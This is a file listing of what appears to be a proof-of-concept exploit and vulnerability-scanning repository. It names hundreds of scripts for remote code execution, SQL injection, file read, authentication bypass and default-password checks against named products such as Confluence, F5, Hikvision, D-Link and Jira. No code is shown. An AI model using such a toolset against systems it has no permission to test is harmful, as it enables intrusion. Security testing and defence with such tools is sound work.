├── README.md
├── main_v1.0.py
├── pocs
├── 360tianqin-2022-file-upload.py
├── Apache-OFBiz-Log4shell-CVE-2021-44228.py
├── Dogtag-PKI-XML-inject-CVE-2022-2414.py
├── H3C-CVM-file-upload.py
├── HIKVISION-zhafmanage.py
├── MagicFlow--mainxp-readfile.py
├── apache-ofbiz-cve-2021-26295.py
├── cjtyct-sqli.py
├── d-link-DIR-600M-Wireless-N-150-Login-Page-Bypass.py
├── d-link-DSR-250N-all-password.py
├── d-link-ShareCenter-DNS-320-system_mgr-rce.py
├── d-link-ac-management-system-default-password.py
├── dictory-read.py
├── dlink-DAR-8000-rce.py
├── ecology_oa_login.py
├── finereportV9-file-upload.py
├── gitlab-cve-2021-22205.py
├── glpi-htmLawedTest-rce-cve-2022-35914.py
├── grafana-cve-2021-43798-fileread.py
├── htpages_upload.py
├── ikuai-sqli.py
├── landrayoa-2022-rce.py
├── memcache_Unauth.py
├── nginx-weak-password.py
├── office365-web-upload-2022.py
├── poc-api-v2-unath.py
├── poc-javamelody-monitoring-unath.py
├── poc-javamelody-monitoring-xss.py
├── poc-thinkphp2022-lang-rce.py
├── poc-yaml-74cms-CNVD-2021-45280.py
├── poc-yaml-74cms-cve-2020-22211-sqli.py
├── poc-yaml-74cms-se-cve-2022-29720.py
├── poc-yaml-74cms-se-cve-2022-33095.py
├── poc-yaml-74cms-sqli-1.py
├── poc-yaml-74cms-sqli-2.py
├── poc-yaml-74cms-sqli.py
├── poc-yaml-Ametys-CMS-CVE-2022-26159.py
├── poc-yaml-Apache-Airflow-Default-Login.py
├── poc-yaml-Apache-apisix-Dashboard-api-unauth-rce.py
├── poc-yaml-Atlassian-Jira-Unauth-User-Enumeration.py
├── poc-yaml-EWEBS-fileread.py
├── poc-yaml-Emlog-CVE-2021-3293.py
├── poc-yaml-Full-read-SSRF-in-Spring-Cloud-Netflix.py
├── poc-yaml-Ivanti-Endpoint-Manager-CVE-2021-44529-RCE.py
├── poc-yaml-PrestaShop-SmartBlog-CVE-2021-37538.py
├── poc-yaml-activemq-cve-2016-3088.py
├── poc-yaml-activemq-default-password.py
├── poc-yaml-adobe-coldfusion-cve-2018-15961.py
├── poc-yaml-adobe-coldfusion-cve-2021-21087.py
├── poc-yaml-airflow-unauth.py
├── poc-yaml-alibaba-anyproxy-fetchbody-fileread.py
├── poc-yaml-alibaba-canal-default-password.py
├── poc-yaml-alibaba-canal-info-leak.py
├── poc-yaml-alibaba-nacos-cve-2021-29442-unauth.py
├── poc-yaml-alibaba-nacos-v1-auth-bypass.py
├── poc-yaml-amcrest-cve-2017-8229-info-leak.py
├── poc-yaml-amtt-hiboss-server-ping-rce.py
├── poc-yaml-anmei-rce.py
├── poc-yaml-apache-airflow-cve-2020-13927-unauthorized.py
├── poc-yaml-apache-ambari-default-password.py
├── poc-yaml-apache-apisix-cve-2020-13945-rce.py
├── poc-yaml-apache-druid-cve-2021-36749.py
├── poc-yaml-apache-flink-upload-rce.py
├── poc-yaml-apache-guacamole-default-password.py
├── poc-yaml-apache-httpd-cve-2021-40438-ssrf.py
├── poc-yaml-apache-httpd-cve-2021-41773-path-traversal.py
├── poc-yaml-apache-httpd-cve-2021-41773-rce.py
├── poc-yaml-apache-kylin-unauth-cve-2020-13937.py
├── poc-yaml-apache-nifi-api-unauthorized-access.py
├── poc-yaml-apache-ofbiz-cve-2018-8033-xxe.py
├── poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization.py
├── poc-yaml-apache-solr-cve-2019-17558-rce.py
├── poc-yaml-apache-spark-rce-cve-2022-33891.py
├── poc-yaml-apache-storm-unauthorized-access.py
├── poc-yaml-apollo-default-password.py
├── poc-yaml-artica-pandora-fms-cve-2020-8497-unauth.py
├── poc-yaml-aspcms-backend-leak.py
├── poc-yaml-aspcms-sqli.py
├── poc-yaml-atlassian-confluence-cve-2022-26134.py
├── poc-yaml-atlassian-jira-cve-2019-3401.py
├── poc-yaml-atlassian-jira-cve-2019-3403.py
├── poc-yaml-atlassian-jira-cve-2022-0540.py
├── poc-yaml-auerswald-cve-2021-40859.py
├── poc-yaml-bash-cve-2014-6271.py
├── poc-yaml-bigant-server-cve-2022-23347-lfi.py
├── poc-yaml-bitbucket-unauth.py
├── poc-yaml-bsphp-unauthorized-access.py
├── poc-yaml-bt742-pma-unauthorized-access.py
├── poc-yaml-cacti-weathermap-file-write.py
├── poc-yaml-cerebro-request-ssrf.py
├── poc-yaml-changjie-crm-sqli.py
├── poc-yaml-changjietong-downloadproxy-file-read.py
├── poc-yaml-china-mobile-yu-router-information-disclosure.py
├── poc-yaml-china-telecom-zte-f460-rce.py
├── poc-yaml-chinaunicom-modem-default-password.py
├── poc-yaml-cisco-cve-2020-3452-readfile.py
├── poc-yaml-citrix-cve-2019-19781-path-traversal.py
├── poc-yaml-citrix-cve-2020-8191-xss.py
├── poc-yaml-citrix-cve-2020-8193-unauthorized.py
├── poc-yaml-citrix-cve-2020-8194-code-injection.py
├── poc-yaml-citrix-xenmobile-cve-2020-8209.py
├── poc-yaml-clickhouse-http-unauth.py
├── poc-yaml-cmseasy-sqli.py
├── poc-yaml-cobub-channel-cve-2018-8057-sqli.py
├── poc-yaml-cockpit-cve-2020-35846-sqli.py
├── poc-yaml-cockpit-cve-2020-35847-nosqli.py
├── poc-yaml-coldfusion-cve-2010-2861-lfi.py
├── poc-yaml-confluence-cve-2015-8399.py
├── poc-yaml-confluence-cve-2019-3396-lfi.py
├── poc-yaml-confluence-cve-2021-26084.py
├── poc-yaml-confluence-cve-2021-26085-arbitrary-file-read.py
├── poc-yaml-confluence-cve-2022-26138.py
├── poc-yaml-consul-service-rce.py
├── poc-yaml-coremail-cnvd-2019-16798.py
├── poc-yaml-couchcms-cve-2018-7662.py
├── poc-yaml-couchdb-cve-2017-12635.py
├── poc-yaml-couchdb-unauth.py
├── poc-yaml-craftcms-seomatic-cve-2020-9757-rce.py
├── poc-yaml-crawlab-users-add.py
├── poc-yaml-cuberite-cve-2019-15516.py
├── poc-yaml-cve-2017-16894-sensitive-documents.py
├── poc-yaml-cve-2022-24990-terramaster-fileupload-or-infoleak.py
├── poc-yaml-d-link-dap-2020-cve-2021-27250.py
├── poc-yaml-d-link-dir-825-cve-2021-46442.py
├── poc-yaml-dahua-cve-2021-33044-authentication-bypass.py
├── poc-yaml-dahua-dss-file-read.py
├── poc-yaml-dapr-dashboard-cve-2022-38817-unauth.py
├── poc-yaml-dataease-cve-2022-34114.py
├── poc-yaml-dataease-defult-password.py
├── poc-yaml-datang-ac-default-password-cnvd-2021-04128.py
├── poc-yaml-dedecms-carbuyaction-fileinclude.py
├── poc-yaml-dedecms-cve-2017-17731-sqli.py
├── poc-yaml-dedecms-cve-2018-6910.py
├── poc-yaml-dedecms-cve-2018-7700-rce.py
├── poc-yaml-dedecms-guestbook-sqli.py
├── poc-yaml-dedecms-membergroup-sqli.py
├── poc-yaml-dedecms-mysql-error-trace.py
├── poc-yaml-dedecms-search-php-sqli.py
├── poc-yaml-dedecms-url-redirection.py
├── poc-yaml-delta-entelitouch-cookie-user-password-disclosure.py
├── poc-yaml-discuz-cve-2019-13956-rce.py
├── poc-yaml-discuz-ml3x-cnvd-2019-22239.py
├── poc-yaml-discuz-v72-sqli.py
├── poc-yaml-discuz-wechat-plugins-unauth.py
├── poc-yaml-discuz-wooyun-2010-080723.py
├── poc-yaml-django-cve-2021-35042-sqli.py
├── poc-yaml-dlink-850l-info-leak.py
├── poc-yaml-dlink-cve-2019-16920-rce.py
├── poc-yaml-dlink-cve-2019-17506.py
├── poc-yaml-dlink-cve-2020-25078-account-disclosure.py
├── poc-yaml-dlink-cve-2020-9376-dump-credentials.py
├── poc-yaml-dlink-cve-2021-42627-unauth.py
├── poc-yaml-dlink-dap-1620-firmware-cve-2021-46381.py
├── poc-yaml-dlink-dsl-28881a-ultra-vires.py
├── poc-yaml-dlink-dsl-2888a-rce.py
├── poc-yaml-doccms-sqli.py
├── poc-yaml-docker-api-unauthorized-rce.py
├── poc-yaml-docker-registry-api-unauth.py
├── poc-yaml-domoticz-cve-2019-10664.py
├── poc-yaml-dotnetcms-sqli.py
├── poc-yaml-dptech-vpn-fileread.py
├── poc-yaml-draytek-cve-2020-8515.py
├── poc-yaml-druid-cve-2021-25646.py
├── poc-yaml-druid-monitor-unauth.py
├── poc-yaml-drupal-cve-2014-3704-sqli.py
├── poc-yaml-drupal-cve-2018-7600-rce.py
├── poc-yaml-drupal-cve-2019-6340.py
├── poc-yaml-dubbo-admin-default-password.py
├── poc-yaml-duomicms-sqli.py
├── poc-yaml-dvr-cve-2018-9995.py
├── poc-yaml-dynamicweb-cve-2022-25369.py
├── poc-yaml-e-message-unauth.py
├── poc-yaml-e-office-v10-sqli.py
├── poc-yaml-e-zkeco-cnvd-2020-57264-read-file.py
├── poc-yaml-earcms-download-php-exec.py
├── poc-yaml-earcms-index-uplog-php-file-upload.py
├── poc-yaml-easyappointments-cve-2022-0482.py
├── poc-yaml-ebridge-sqli.py
├── poc-yaml-ecology-arbitrary-file-upload.py
├── poc-yaml-ecology-filedownload-directory-traversal.py
├── poc-yaml-ecology-hrmcareerapplyperview-sql.py
├── poc-yaml-ecology-javabeanshell-rce.py
├── poc-yaml-ecology-oa-eoffice-officeserver-php-file-read.py
├── poc-yaml-ecology-springframework-directory-traversal.py
├── poc-yaml-ecology-syncuserinfo-sqli.py
├── poc-yaml-ecology-v8-sqli.py
├── poc-yaml-ecology-validate-sqli.py
├── poc-yaml-ecology-workflowcentertreedata-sqli.py
├── poc-yaml-ecshop-cnvd-2020-58823-sqli.py
├── poc-yaml-ecshop-collection-list-sqli.py
├── poc-yaml-ecshop-rce.py
├── poc-yaml-eea-info-leak-cnvd-2021-10543.py
├── poc-yaml-egroupware-spellchecker-rce.py
├── poc-yaml-elasticsearch-cve-2014-3120.py
├── poc-yaml-elasticsearch-cve-2015-1427.py
├── poc-yaml-elasticsearch-cve-2015-3337-lfi.py
├── poc-yaml-elasticsearch-cve-2015-5531.py
├── poc-yaml-elasticsearch-unauth.py
├── poc-yaml-elfinder-cve-2021-32682-rce.py
├── poc-yaml-emby-mediaserver-cve-2020-26948.py
├── poc-yaml-emerge-e3-cve-2019-7254.py
├── poc-yaml-emerge-e3-cve-2019-7256.py
├── poc-yaml-essl-dataapp-unauth-db-leak.py
├── poc-yaml-etcd-unauth.py
├── poc-yaml-etouch-v2-sqli.py
├── poc-yaml-evpn-information.py
├── poc-yaml-exchange-cve-2021-26855-ssrf.py
├── poc-yaml-exchange-cve-2021-41349-xss.py
├── poc-yaml-eyoucms-cve-2021-39501.py
├── poc-yaml-ezoffice-filupload-controller-getshell.py
├── poc-yaml-ezoffice-smartupload-jsp-upload.py
├── poc-yaml-f5-cve-2021-22986.py
├── poc-yaml-f5-cve-2022-1388.py
├── poc-yaml-f5-tmui-cve-2020-5902-rce.py
├── poc-yaml-fangweicms-sqli.py
├── poc-yaml-fanweioa-signaturedownload-file-read.py
├── poc-yaml-feifeicms-lfr.py
├── poc-yaml-feiyuxing-route-wifi-password-leak.py
├── poc-yaml-fhem-file-read-cve-2020-19360.py
├── poc-yaml-fineCMS-getshell.py
├── poc-yaml-finecms-cve-2018-6893.py
├── poc-yaml-finecms-filedownload.py
├── poc-yaml-finecms-sqli.py
├── poc-yaml-finereport-directory-traversal.py
├── poc-yaml-flexpaper-cve-2018-11686.py
├── poc-yaml-flink-jobmanager-cve-2020-17519-lfi.py
├── poc-yaml-fortigate-cve-2018-13379-readfile.py
├── poc-yaml-fortinet-cve-2022-40684-auth-bypass.py
├── poc-yaml-franklinfueling-cve-2021-46417-lfi.py
├── poc-yaml-frp-dashboard-unauth.py
├── poc-yaml-fuelcms-cve-2018-16763-rce.py
├── poc-yaml-fumengyun-ajaxmethod-name-sqli.py
├── poc-yaml-gateone-cve-2020-35736.py
├── poc-yaml-genixcms-register-cve-2015-3933-sqli.py
├── poc-yaml-getsimple-cve-2019-11231.py
├── poc-yaml-ghostscript-cve-2018-19475-rce.py
├── poc-yaml-gilacms-cve-2020-5515.py
├── poc-yaml-gitblit-cve-2022-31268.py
├── poc-yaml-gitlab-graphql-info-leak-cve-2020-26413.py
├── poc-yaml-gitlab-ssrf-cve-2021-22214.py
├── poc-yaml-gitlist-rce-cve-2018-1000533.py
├── poc-yaml-glassfish-cve-2017-1000028-lfi.py
├── poc-yaml-glpi-barcode-cve-2021-43778-path-traversal.py
├── poc-yaml-glpi-telemetry-cve-2021-39211-info-leak.py
├── poc-yaml-go-pprof-leak.py
├── poc-yaml-gocd-cve-2021-43287.py
├── poc-yaml-gogs-cve-2018-18925-rce.py
├── poc-yaml-grafana-default-password.py
├── poc-yaml-grafana-snapshot-cve-2021-39226.py
├── poc-yaml-greencms-cve-2018-12604.py
├── poc-yaml-h2-database-web-console-unauthorized-access.py
├── poc-yaml-h3c-imc-rce.py
├── poc-yaml-h3c-route-unauthorized.py
├── poc-yaml-h3c-secparh-any-user-login.py
├── poc-yaml-h5s-accout-password-leakage.py
├── poc-yaml-h5s-video-platform-cnvd-2020-67113-unauth.py
├── poc-yaml-hadoop-yarn-rpc-rce.py
├── poc-yaml-hadoop-yarn-unauth.py
├── poc-yaml-hanming-video-conferencing-file-read.py
├── poc-yaml-harbor-cve-2019-16097.py
├── poc-yaml-hd-network-real-time-monitoring-system-cve-2021-45043.py
├── poc-yaml-hikvision-all-file-download.py
├── poc-yaml-hikvision-cve-2017-7921.py
├── poc-yaml-hikvision-info-leak.py
├── poc-yaml-hikvision-intercom-service-default-password.py
├── poc-yaml-hikvision-readfile.py
├── poc-yaml-hikvision-unauthenticated-rce-cve-2021-36260.py
├── poc-yaml-hitachi-vantara-pentaho-business-analytics-cve-2021-34684.py
├── poc-yaml-hjtcloud-arbitrary-fileread.py
├── poc-yaml-hjtcloud-directory-file-leak.py
├── poc-yaml-hongfan-oa-readfile.py
├── poc-yaml-hongfan-oa-sqli.py
├── poc-yaml-huawei-home-gateway-hg659-fileread.py
├── poc-yaml-huaxia-jsherp-info-leak.py
├── poc-yaml-huayu-reporter-rce.py
├── poc-yaml-ibm-websphere-portal-hcl-cve-2021-27748-ssrf.py
├── poc-yaml-ifw8-router-cve-2019-16313.py
├── poc-yaml-iis-put-getshell.py
├── poc-yaml-influxdb-unauth.py
├── poc-yaml-inspur-tscev4-cve-2020-21224-rce.py
├── poc-yaml-intelbras-wireless-cve-2021-3017.py
├── poc-yaml-interlib-read-file.py
├── poc-yaml-jboss-cve-2010-1871.py
├── poc-yaml-jboss-unauth.py
├── poc-yaml-jeewms-showordownbyurl-fileread.py
├── poc-yaml-jellyfin-cve-2021-29490.py
├── poc-yaml-jellyfin-file-read-cve-2021-21402.py
├── poc-yaml-jenkins-cve-2018-1000600.py
├── poc-yaml-jenkins-cve-2018-1000861-rce.py
├── poc-yaml-jenkins-unauthorized-access.py
├── poc-yaml-jetty-cve-2021-28164,34429.py
├── poc-yaml-jetty-servlets-concatservlet-information-disclosure-cve-2021-28169.py
├── poc-yaml-jiecheng-fileupload-cnvd-2022-55416.py
├── poc-yaml-jinhe-oa-readfile.py
├── poc-yaml-jinher-oa-c6-default-password.py
├── poc-yaml-jira-cve-2019-11581.py
├── poc-yaml-jira-cve-2019-8442.py
├── poc-yaml-jira-cve-2019-8449.py
├── poc-yaml-jira-cve-2020-14179.py
├── poc-yaml-jira-cve-2020-14181.py
├── poc-yaml-jira-cve-2021-26086.py
├── poc-yaml-jira-ssrf-cve-2019-8451.py
├── poc-yaml-joomla-cnvd-2019-34135-rce.py
├── poc-yaml-joomla-component-vreview-sql.py
├── poc-yaml-joomla-cve-2015-7297-sqli.py
├── poc-yaml-joomla-cve-2017-8917-sqli.py
├── poc-yaml-joomla-cve-2018-7314-sql.py
├── poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli.py
├── poc-yaml-joomla-history-cve-2015-7857-sqli.py
├── poc-yaml-joomla-jck-cve-2018-17254-sqli.py
├── poc-yaml-jquery-picture-cut-upload-php-fileupload-cve-2018-9208.py
├── poc-yaml-jsrog-artifactory-cve-2019-17444.py
├── poc-yaml-jsrog-artifactory-cve-2019-9733.py
├── poc-yaml-jumpserver-unauth-rce.py
├── poc-yaml-junams-fileupload-cnvd-2020-24741.py
├── poc-yaml-jupyter-notebook-rce.py
├── poc-yaml-jupyter-notebook-unauthorized-access.py
├── poc-yaml-kafka-manager-unauth.py
├── poc-yaml-kavita-cover-upload-file-read.py
├── poc-yaml-kemai-ras-ultra-vires.py
├── poc-yaml-kibana-cve-2018-17246.py
├── poc-yaml-kibana-cve-2019-7609-rce.py
├── poc-yaml-kibana-unauth.py
├── poc-yaml-kingdee-eas-directory-traversal.py
├── poc-yaml-kingdee-oa-apusic-readfile.py
├── poc-yaml-kingsoft-v8-default-password.py
├── poc-yaml-kingsoft-v8-file-read.py
├── poc-yaml-kkfileview-cve-2021-43734.py
├── poc-yaml-kkfileview-xss-cve-2022-35151.py
├── poc-yaml-kodexplorer-directory-traversal.py
├── poc-yaml-kong-cve-2020-11710-unauth.py
├── poc-yaml-konga-jwt-weak.py
├── poc-yaml-kubernetes-unauth.py
├── poc-yaml-kunshi-vos3000-fileread.py
├── poc-yaml-kyan-network-monitoring-account-password-leakage.py
├── poc-yaml-kyocera-file-read.py
├── poc-yaml-kyocera-printer-cve-2020-23575-path-traversal.py
├── poc-yaml-landray-oa-custom-jsp-fileread.py
├── poc-yaml-landray-oa-rce.py
├── poc-yaml-lanproxy-cve-2021-3019-lfi.py
├── poc-yaml-laravel-cve-2021-3129.py
├── poc-yaml-laravel-debug-info-leak.py
├── poc-yaml-laravel-improper-webdir.py
├── poc-yaml-lg-n1a1-nas-cnnvd-201607-467-rce.py
├── poc-yaml-lionfish-cms-image-upload-php-upload.py
├── poc-yaml-lionfish-cms-wxapp-php-upload.py
├── poc-yaml-lucee-cve-2021-21307-rce.py
├── poc-yaml-maccms-cve-2017-17733-rce.py
├── poc-yaml-maccms-rce.py
├── poc-yaml-maccmsv10-backdoor.py
├── poc-yaml-manageengine-opmanager-cve-2020-11946.py
├── poc-yaml-manageengine-servicedesk-cve-2017-11512-lfi.py
├── poc-yaml-mastodon-cve-2022-0432.py
├── poc-yaml-metabase-cve-2021-41277.py
├── poc-yaml-metersphere-plugincontroller-rce.py
├── poc-yaml-metinfo-cve-2019-16996-sqli.py
├── poc-yaml-metinfo-cve-2019-16997-sqli.py
├── poc-yaml-metinfo-cve-2019-17418-sqli.py
├── poc-yaml-metinfo-file-read.py
├── poc-yaml-metinfo-lfi-cnvd-2018-13393.py
├── poc-yaml-metinfo-x-rewrite-url-sqli.py
├── poc-yaml-microweber-cve-2022-0378.py
├── poc-yaml-microweber-cve-2022-0666.py
├── poc-yaml-mingyu-waf-login-bypass.py
├── poc-yaml-mini-httpd-cve-2018-18778-readfile.py
├── poc-yaml-minio-default-password.py
├── poc-yaml-mongo-express-cve-2019-10758.py
├── poc-yaml-motioneye-info-leak-cve-2022-25568.py
├── poc-yaml-movabletype-cve-2021-20837-rce.py
├── poc-yaml-mpsec-isg1000-file-read.py
├── poc-yaml-msvod-sqli.py
├── poc-yaml-myucms-lfr.py
├── poc-yaml-nagio-cve-2018-10735.py
├── poc-yaml-nagio-cve-2018-10736.py
├── poc-yaml-nagio-cve-2018-10737.py
├── poc-yaml-nagio-cve-2018-10738.py
├── poc-yaml-natshell-arbitrary-file-read.py
├── poc-yaml-netLoong-fw-rce.py
├── poc-yaml-netentsec-icg-default-password.py
├── poc-yaml-netentsec-ngfw-rce.py
├── poc-yaml-netgear-cnnvd-201306-024.py
├── poc-yaml-netgear-cve-2017-5521.py
├── poc-yaml-netgear-ssl-vpn-20211222-cve-2022-29383.py
├── poc-yaml-netpower-readfile.py
├── poc-yaml-netsweeper-webadmin-cve-2020-13167.py
├── poc-yaml-nette-framework-cve-2020-15227-rce.py
├── poc-yaml-nextjs-cve-2017-16877.py
├── poc-yaml-nexus-cve-2019-7238.py
├── poc-yaml-nexus-cve-2020-10199.py
├── poc-yaml-nexus-default-password.py
├── poc-yaml-nexusdb-cve-2020-24571-path-traversal.py
├── poc-yaml-nginx-path-traversal.py
├── poc-yaml-nhttpd-cve-2019-16278.py
├── poc-yaml-niushop-attrarray-sqli.py
├── poc-yaml-node-red-cve-2021-25864-fileread.py
├── poc-yaml-node-red-dashboard-file-read-cve-2021-3223.py
├── poc-yaml-node-red-file-read.py
├── poc-yaml-nostromo-cve-2011-0751-directory-traversal.py
├── poc-yaml-novnc-url-redirection-cve-2021-3654.py
├── poc-yaml-nps-auth-bypass.py
├── poc-yaml-nps-default-password.py
├── poc-yaml-ns-asg-file-read.py
├── poc-yaml-nsfocus-uts-password-leak.py
├── poc-yaml-nuuo-file-inclusion.py
├── poc-yaml-nuuo-nvrmini-cve-2018-14933.py
├── poc-yaml-nuxeo-cve-2018-16341-rce.py
├── poc-yaml-oa8000-workflowservice-sqli.py
├── poc-yaml-odoo-cve-2019-14322.py
├── poc-yaml-odoo-file-read.py
├── poc-yaml-onethink-sqli.py
├── poc-yaml-openfire-cve-2019-18394-ssrf.py
├── poc-yaml-opensis-cve-2020-6637.py
├── poc-yaml-opentsdb-cve-2020-35476-rce.py
├── poc-yaml-oracle-ebs-bispgrapgh-file-read.py
├── poc-yaml-oracle-ebs-cve-2018-3167-ssrf.py
├── poc-yaml-panabit-gateway-default-password.py
├── poc-yaml-panabit-ixcache-default-password.py
├── poc-yaml-panabit-syaddmount-command-exec.py
├── poc-yaml-pandorafms-defaultpass-or-cve-2019-20224-rce.py
├── poc-yaml-pbootcms-database-file-download.py
├── poc-yaml-pbootcms-rce-cve-2022-32417.py
├── poc-yaml-pentaho-cve-2021-31602-authentication-bypass.py
├── poc-yaml-php-cgi-cve-2012-1823-rce.py
├── poc-yaml-php-cgi-cve-2012-1823.py
├── poc-yaml-php-chat-live-uploadimg-html-upload.py
├── poc-yaml-php-imap-cve-2018-19518-rce.py
├── poc-yaml-phpcms-960-sqli.py
├── poc-yaml-phpcms-cve-2018-19127.py
├── poc-yaml-phpmoadmin-cve-2015-2208-rce.py
├── poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.py
├── poc-yaml-phpmyadmin-setup-deserialization.py
├── poc-yaml-phpok-sqli.py
├── poc-yaml-phpshe-sqli.py
├── poc-yaml-phpstudy-backdoor-rce.py
├── poc-yaml-phpstudy-nginx-wrong-resolve.py
├── poc-yaml-phpunit-cve-2017-9841-rce.py
├── poc-yaml-phpweb-appplus-php-upload.py
├── poc-yaml-pigcms-file-upload.py
├── poc-yaml-piwigo-cve-2022-26266-sqli.py
├── poc-yaml-piwigo-weak-password.py
├── poc-yaml-powercreator-arbitrary-file-upload.py
├── poc-yaml-prometheus-url-redirection-cve-2021-29622.py
├── poc-yaml-prtg-network-monitor-cve-2020-11547-info-leak.py
├── poc-yaml-pulse-cve-2019-11510.py
├── poc-yaml-pyspider-unauthorized-access.py
├── poc-yaml-qiboCMS-readfile.py
├── poc-yaml-qibocms-sqli.py
├── poc-yaml-qilin-bastion-host-rce.py
├── poc-yaml-qizhi-fortressaircraft-unauthorized.py
├── poc-yaml-qnap-cve-2019-7192.py
├── poc-yaml-rabbitmq-default-password.py
├── poc-yaml-rails-cve-2018-3760-rce.py
├── poc-yaml-razor-cve-2018-8770.py
├── poc-yaml-rconfig-ajaxserversettingschk-cve-2019-16662-rce.py
├── poc-yaml-rconfig-commands-inc-cve-2020-10220-sqli.py
├── poc-yaml-rconfig-cve-2019-16663.py
├── poc-yaml-rconfig-cve-2020-10546.py
├── poc-yaml-rconfig-cve-2020-10547.py
├── poc-yaml-rconfig-cve-2020-10548.py
├── poc-yaml-rconfig-cve-2020-10549.py
├── poc-yaml-red-hat-freeipa-cve-2022-2414-xxe.py
├── poc-yaml-redash-cve-2021-41192-unauth.py
├── poc-yaml-redis-cve-2022-0543-rce.py
├── poc-yaml-redis-unauth.py
├── poc-yaml-redis-weak-password.py
├── poc-yaml-reolink-nvr-configuration-disclosure-cve-2021-40150.py
├── poc-yaml-reolink-rlc-410w-cve-2022-21236.py
├── poc-yaml-reporter-file-read.py
├── poc-yaml-resin-Directory-traversal-cve-2021-44138.py
├── poc-yaml-resin-cnnvd-200705-315.py
├── poc-yaml-resin-inputfile-fileread-or-ssrf.py
├── poc-yaml-resin-viewfile-fileread.py
├── poc-yaml-rockmongo-default-password.py
├── poc-yaml-ruckus-default-password.py
├── poc-yaml-rudloff-alltube-cve-2022-0692.py
├── poc-yaml-ruijie-eg-cli-rce.py
├── poc-yaml-ruijie-eg-file-read.py
├── poc-yaml-ruijie-eg-info-leak.py
├── poc-yaml-ruijie-eweb-rce-cnvd-2021-09650.py
├── poc-yaml-ruijie-nbr1300g-cli-password-leak.py
├── poc-yaml-ruijie-uac-cnvd-2021-14536.py
├── poc-yaml-ruoyi-management-defaultpass.py
├── poc-yaml-ruoyi-management-fileread.py
├── poc-yaml-saltstack-cve-2020-16846.py
├── poc-yaml-saltstack-cve-2021-25282-file-write.py
├── poc-yaml-samsung-wea453e-default-pwd.py
├── poc-yaml-samsung-wea453e-rce.py
├── poc-yaml-samsung-wlan-ap-wea453e-rce.py
├── poc-yaml-sanfor-reporter-anyfileread.py
├── poc-yaml-sangfor-ba-rce.py
├── poc-yaml-sangfor-edr-arbitrary-admin-login.py
├── poc-yaml-sangfor-edr-cssp-rce.py
├── poc-yaml-sangfor-edr-tool-rce.py
├── poc-yaml-sapido-router-unauthenticated-rce.py
├── poc-yaml-satellian-cve-2020-7980-rce.py
├── poc-yaml-seacms-before-v992-rce.py
├── poc-yaml-seacms-rce.py
├── poc-yaml-seacms-sqli.py
├── poc-yaml-seacms-v654-rce.py
├── poc-yaml-seacmsv645-command-exec.py
├── poc-yaml-searchblox-cve-2020-35580.py
├── poc-yaml-secnet-ac-default-password.py
├── poc-yaml-seeyon-a6-employee-info-leak.py
├── poc-yaml-seeyon-ajax-unauthorized-access.py
├── poc-yaml-seeyon-cnvd-2020-62422-readfile.py
├── poc-yaml-seeyon-default-password.py
├── poc-yaml-seeyon-oa-a6-information-disclosure.py
├── poc-yaml-seeyon-oa-a8-m-information-disclosure.py
├── poc-yaml-seeyon-oa-cookie-leak.py
├── poc-yaml-seeyon-session-leak.py
├── poc-yaml-seeyon-wooyun-2015-0108235-sqli.py
├── poc-yaml-seeyon-wooyun-2015-148227.py
├── poc-yaml-selea-ocr-anpr-arbitrary-get-file-read.py
├── poc-yaml-selea-ocr-anpr-arbitrary-seleacamera-file-read.py
├── poc-yaml-shiziyu-cms-apicontroller-sqli.py
├── poc-yaml-shopxo-cnvd-2021-15822.py
├── poc-yaml-showdoc-cnvd-2020-26585.py
├── poc-yaml-showdoc-default-password.py
├── poc-yaml-showdoc-uploadfile.py
├── poc-yaml-skywalking-cve-2020-9483-sqli.py
├── poc-yaml-socomec-cve-2019-15859.py
├── poc-yaml-solarview-compact-rce-cve-2022-29298.py
├── poc-yaml-solarwinds-cve-2020-10148.py
├── poc-yaml-solarwinds-orion-api-cve-2020-10148-unauth.py
├── poc-yaml-solr-cve-2017-12629-xxe.py
├── poc-yaml-solr-cve-2019-0193.py
├── poc-yaml-solr-fileread.py
├── poc-yaml-solr-velocity-template-rce.py
├── poc-yaml-sonarqube-cve-2020-27986-unauth.py
├── poc-yaml-sonarqube-search-projects-project-code-leak.py
├── poc-yaml-sonicwall-ssl-vpn-rce.py
├── poc-yaml-sophosfirewall-bypass.py
├── poc-yaml-spark-api-unauth.py
├── poc-yaml-spark-webui-unauth.py
├── poc-yaml-specoweb-cve-2021-32572-fileread.py
├── poc-yaml-spiderflow-save-remote-command-execute.py
├── poc-yaml-spon-ip-intercom-file-read.py
├── poc-yaml-spon-ip-intercom-ping-rce.py
├── poc-yaml-spring-boot-actuator-logview-cve-2021-21234-directory-traversal.py
├── poc-yaml-spring-cloud-cve-2020-5405.py
├── poc-yaml-spring-cloud-cve-2020-5410.py
├── poc-yaml-spring-cloud-gateway-cve-2022-22947-rce.py
├── poc-yaml-spring-cve-2016-4977.py
├── poc-yaml-spring-data-rest-cve-2017-8046-rce.py
├── poc-yaml-springboot-env-unauth.py
├── poc-yaml-springcloud-cve-2019-3799.py
├── poc-yaml-subrions-search-cve-2017-11444-sqli.py
├── poc-yaml-sunlogin-rce.py
├── poc-yaml-supervisord-cve-2017-11610.py
├── poc-yaml-supesite-sqli.py
├── poc-yaml-sysaid-itil-cve-2021-43972.py
├── poc-yaml-tamronos-iptv-rce.py
├── poc-yaml-tapestry-cve-2019-0195-readfile.py
├── poc-yaml-teampass-cve-2020-12478-unauth.py
├── poc-yaml-teclib-glpl-cve-2019-10232.py
├── poc-yaml-telecom-gateway-default-password.py
├── poc-yaml-telecom-gateway-sqli.py
├── poc-yaml-telesquare-cve-2021-46422-rce.py
├── poc-yaml-tenda-11n-ultra-vires.py
├── poc-yaml-tenda-w15e-passsword-leak.py
├── poc-yaml-tensorboard-unauth.py
├── poc-yaml-terramaster-cve-2020-15568.py
├── poc-yaml-terramaster-tos-cve-2022-24989.py
├── poc-yaml-terramaster-tos-rce-cve-2020-28188.py
├── poc-yaml-thinfinity-virtualui-cve-2021-44848-user-enum-unauth.py
├── poc-yaml-thinkadmin-v6-readfile.py
├── poc-yaml-thinkcmf-lfi.py
├── poc-yaml-thinkcmf-write-shell.py
├── poc-yaml-thinkphp-v6-file-write.py
├── poc-yaml-thinkphp5-controller-rce.py
├── poc-yaml-thinkphp5-rce-cnvd-2018-24942.py
├── poc-yaml-thinkphp5023-method-rce.py
├── poc-yaml-tianqing-info-leak.py
├── poc-yaml-tibco-jasperreports-cve-2018-18809-directory-traversal.py
├── poc-yaml-tieline-ip-audio-gateway-cve-2021-35336.py
